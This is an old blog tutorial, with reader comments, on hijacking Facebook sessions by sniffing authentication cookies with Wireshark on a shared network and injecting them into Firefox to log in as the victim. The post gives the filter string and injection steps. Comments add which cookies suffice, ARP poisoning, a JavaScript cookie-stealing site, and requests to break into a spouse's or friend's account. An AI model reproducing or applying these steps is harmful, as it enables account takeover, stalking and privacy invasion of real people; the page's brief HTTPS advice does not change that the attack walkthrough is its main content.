How to steal Facebook Authentication cookies

How to hack a facebook account – or, basically how to hijack php sessions. Yes – this is old news – yes its a common vulnerability – but you get a better idea for what it is and how it works when things are explained in detail (with screenshots!).

Before we begin, however, I want to re-emphasize that it is VERY EASY to protect yourself against this sort of attack. Facebook supports HTTPS, so when you browse facebook (or twitter for that matter) or if you have it bookmarked – please make sure you’re using HTTPS:// rather than HTTP:// in the URL at the very least, if not using a VPN solution for further encryption. Also, if the ‘victim’ logs out of facebook, the attackers session becomes invalid – so it’s a good practice to actually log out of facebook and log back in again rather than using the ‘remember me’ checkbox.

Facebook like many sites operates using authentication cookies. Their auth cookies contain a variety of information, but for our purposes this is irrelevant. Here is a sanitized cookie for reference:

Cookie: datr=1276721606-b7f94f977295759399293c5b0767618dc02111ede159a827030fc; lsd=Xesut; lxe=greg.evans%40****************; c_user=100001230367821; lo=wl9fcGXMhPfoT4bAhKFP3Q; lxs=1; sct=1276721745; xs=a615cfe596448194d6e2a8d062a90e4e

You can see the ‘lxe’ field is the login. We haven’t done any further research into what the various other fields mean, but using facebook without any kind of security you’re both leaking the email address used for your login and the session cookie.

First thing you’ll want to do is fire up your favorite packet capture application. For this example we’ve used Wireshark:

Next, set the filter in the top left to ” http.cookie contains “datr” “. This should show you only packets captured which contain the cookie we’re looking for. You can see that in this screenshot we’ve already captured a cookie.

Once you’ve found a suitable cookie, you can copy it into the buffer by right clicking on the cookie line, and clicking Copy -> Bytes (Printable Text Only)

Next you’ll want to open up firefox. You’ll need both greasemonkey and the cookieinjector script.

Simply browse to facebook – make sure you are not logged in:

Hit ALT-C to bring up the cookie injector dialog box:

Then paste in the cookie!

Hit refresh and – VIOLA! you’re now logged in as your victim! Now this doesn’t give you access to their credentials, this is about the equivalent to walking up to their workstation while they’re away from their desk and using facebook.

Neat huh? Pretty easy too. I smiled big when we demo’ed the attack in our lab – its old, sure, but being successful is always a good feeling!

P.S: This isnt REALLY Gregory Evans account. We setup this account because .. well.. the name was available! We thought it was in good taste as the No #1 hacker’s twitter feed got hacked the other day, his site is riddled with XSS exploits, and his book is copypasta from a variety of certification exam prep books. Thanks to Nick and mckt for the work and tootilage, respectively. No noobs were harmed in the making of this film.

49 thoughts on “How to steal Facebook Authentication cookies

  1. Where are you running wireshark that you’re capturing another users cookies? Woudn’t that have to be run local to their system? Or local to system they login on?

  2. Yes, this attack is structured towards people on the lan. In this case, we’re assuming the attacker either has gained control of the upstream device (wifi AP, switch etc) or has performed an arp poison attack, or another MITM (man in the middle) attack.

  3. A shame you’re not publishing on your blog anymore !
    It was really interesting !
    I am a Derren Brown fanatic and a hak n00b, and so was really interested
    in your posts !
    Keep up the great posts and stuff …please !!!

    Hugo

  4. hey i am a n00b hacker, well i am more a beginner than n00b
    anyway, this post is very very interesting and really shame 4 not publishing
    posts like this any more

  5. Thanks for this info! It may help catch the thief who robbed my neighbors house.

    On my advice, they were running web backup software on their new iMac. We saw there had been backups today (the day after the robbery). I recovered the Safari history and cookies which had been touched today. I could see the thief had logged into facebook in the history file. Stumped for a while, but then hit this page with a lucky Google search. The cookies in the cookies file didn’t quite match up, and had already expired, but I tried it anyway. Didn’t log me in, but did populate the login/email field with the thief’s email address. Got their profile page: picture, name, and a few other personal facts.

    Hope the police can/will arrest the guy with this evidence!

  6. Oh epic! Good work Justin!
    You might want to check this out too, since it touches directly on that subject:

    Also some things to consider:
    - use maltego to find everything you can about the email address
    - Contact facebook and ask for their cooperation (though I’d contact the police/FBI first to get the paperwork started – companies are a lot more likely to work with you if you already have a case number)
    - email that address and try to start a conversation with the thief – if he replies, its very likely you can get his home IP address, that way you can contact the ISP, give them the case number from the police and try to get them to act faster than they did for zoz (that youtube link)

    Good luck!

  7. Thanks! Watched the video. Hilarious. Gave me the idea to look at the Keychain file – now I have the Air Port network name and password – the password is a phone number that according to a reverse lookup site, is a landline in Hayward, CA (about 10 miles from where I live).

    The online backup service is BackBlaze. They’ve kindly provided the ip address from which the computer was last backing itself up. That also traces to Hayward, CA.

    The kid is on the football team at the community college in Hayward (facebook profile), and the 2010 roster lists his high school (guess which city?).

    For all intents and purposes, I know exactly where the computer is. Not that I’m going to mess with a 19 year-old thug from a bad neighborhood by myself. I really hope the police jump on this. Also, if our local police department (castrated by budget cuts) can’t pursue this, perhaps we can try the Hayward police.

    I’m a software guy (lots of enterprise SAS stuff) – this security stuff/white hat hacking is pretty fun and eye-opening!

    Thanks again!

  8. Pingback: Justin’s week in crime fighting « The Binders

  9. I’ve got a question for anyone who might be able to answer it:

    I am familiar with the more complex methods of hijacking HTTP sessions, and have regularly used wireshark to extract cookie data. However, I also have access to live .txt cookies (i.e., in the %userprofile%Cookies directory), and expect I can also use these in some manner. I’ve been trying to manipulate them for a few hours and have been unsuccessful.

    The cookie data I see includes “lu” and “datr”. Cookies are not marked “secure”. Via a network sniff (as above), I’ve noted that the wireshark cookie dump also includes a “c_user” cookie, not contained in the file-level cookies. I am curious if this might be necessary.

    I have also tried running application-level import / exports (with proper reencoding), and using manual cookie editors.

    The strange thing is, I actually got an import to work for me, only once, the very first time I tried it. I expected it would be easier, so I didn’t pay attention to the procedure.

    Anyone?

  10. @Cookie Monster: I’ve had my luck purely with copying the entirety of the cookie and pasting it in. I guess technically if each value is a cookie, then its multiple cookies, but it seems easy to just fork lift it like I’ve described. I’d start by comparing the values side to side. My presumption is that whatever facebook is using now will be the objective, so see what from that you can get with the directory method and see what else you need to fill in the gaps. Sorry I couldn’t be of more help! Try it and report back your success! :D

  11. Thanks, Dan. Here is my update:

    The only two cookies required are c_user and xs. In a non-TLS’d wireshark capture, you will see that these are also present in POST packet which is being alt-c’d into Firefox. The datr and lu cookies are not needed.

    At a file level, there is the additional problem that IE8 is storing non-persistent cookies in memory only. They simply do not exist on disk. I’ve noted this behavior on my test systems, which are clean VM’s running IE8 with default values (no in-private filtering, etc.).

    I have also noted that – with Firefox and Chrome – the c_user and xs cookies are in fact available from disk. Maybe this is why your forklift was successful. I was also successful utilizing file data stored by these browsers.

    At this point, I am interested in either (a) finding a method to dump session cookies from RAM on a remote machine, or (b) forcing IE to write session cookies back to disk. Of course, any advice would certainly be welcome.

    Dan – I really enjoyed that Youtube video.

  12. I have a question that might be a bit dump!
    I use firebug addon with firefox and when I tried to get the value of document.cookie , everything was there except “xs”, “datr”, “lu” and “sct” cookies values. However, I found them at request headers which means that they get sent to the server, but the are hidden or excluded somehow from document.cookie
    So, my question is, is this really possible?? I mean is it possible to hide an active cookie from document.cookie??
    Thanks in advance

  13. Never mind about my previous question. I figured it out after some search. Microsoft added httponly option to cookies since IE 6 sp1 and it’s available in all modern browsers and cross site tracing which was discovered in 2003 is blocked by almost all modern browsers.
    Now my dumb question (as usual xD) is … is there a way to get “httponly” cookies??? any way??

  14. Pingback: Faceshark | lo0.nu

  15. If I wanted to log back into a facebook acct that I used cookie injector on, I can’t. I only get the username,but no password. I followed the exact procedure the first time,but this time I can’t get into the account. Why is that?

  16. i want to check if my husband is doing something wrong and would like to catch this flirty bitch of him. he usually signs in to facebook using my computer. and i wanted to be able to get into his account. i have all of his previous sessions in my history, please, please, please tell me what should i do to be able to enter his account.

    -leah

  17. Thanks i have hacked one of my friend in lan thanksssss!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

  18. this is a lan style attack, so you’d have to be on the same network – unless you control the uplink – in which case “you control their internet”..

  19. CAN YOU HELP ME PLEASEEE!!!!
    When i copy an paste it an click ok,a message comes saying “All cookies have been written” what am i doing wrong plss help asap!!!!!

  20. help me please.. I’m following all stps but when I write “http.cookie contains “datr”” the filter bar turns red and it wont let me continue, why is that happening?

  21. if the filter bar turns red it means your syntax is incorrect.
    One way to proceed is to use tcpick instead of tcpdump or wireshark, the syntax for pulling out cookies is much simpler.

    Another approach would be to try to use network miner, I’m pretty sure that can do it.
    If you’re on windows, you can just install firesheep and that will work as well.

    This blogpost was written BEFORE firesheep existed, so things have gotten far far easier.

  22. Pingback: Web Security: ASP.NET authentication cookies and their security - campusMVP.Net | campusMVP.Net

  23. Question : how to sniff ( wireshark ) another PC’s packets and is not on the same LAN ?

  24. One way to execute this attack is to not use wireshark, use a combination of javascript injection and php to collect the cookie. Say if you type this javascript injection, it will say Hello. Put alert(“Hello”); and load the cookie stealing script. I will have a site that does this automatically: sz7c39.x10.mx, but it will be password protected.

  25. IMPORTANT: be aware that you cannot access his account if your victim clicked the “LOGOUT”, be aware that we are just hacking the sessions and once the user logout it destroy the sessions… to test this.. don’t click “logout”! just clear your cookies on the browser :D

  26. Why do you need greasemonkey?
    i mean you are not changing any source code or somethin

  27. Would stealing the cookies still work if they’re connected to the wifi network on their phone?

  28. This trick won’t work anymore…
    it only works with HTTP connections, Facebook now uses Secure connection(HTTPS)_.

  29. Hi I capture wireshark program distributes cookies. I think the issue is related to packet filtering. I am using the version of wireshark 1.10.2. But I can not find my search http.cookie distributes contains all the packages listed.and edit> preferences> under the filter expression is not limited to, the long packets. Please help those who set the matter.and advice for network monitoring. tupsoft bigmother (arconsole) program. pop accurate reading e-mails. log records and the internet. goodbye

  30. Why i cant capture any cookies with wireshark now? 18/10/2013. did they patched it or sth? Thanks.

  31. Congratulations, you’ve just figured out how to hijack your own Facebook!

    FYI, if you’re thinking you’re going to hijack someone elses account through this method, think again..
    (Of course, unless if you can run Wireshark on their computer without them knowing)

  32. Pingback: What are some of the best Facebook hacking tips? - Quora

  33. Hey I m having problem with this. How should we know that it’s datr one and how will it know who s account we are hacking as it is not mentioned anywhere?

Leave a Reply

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>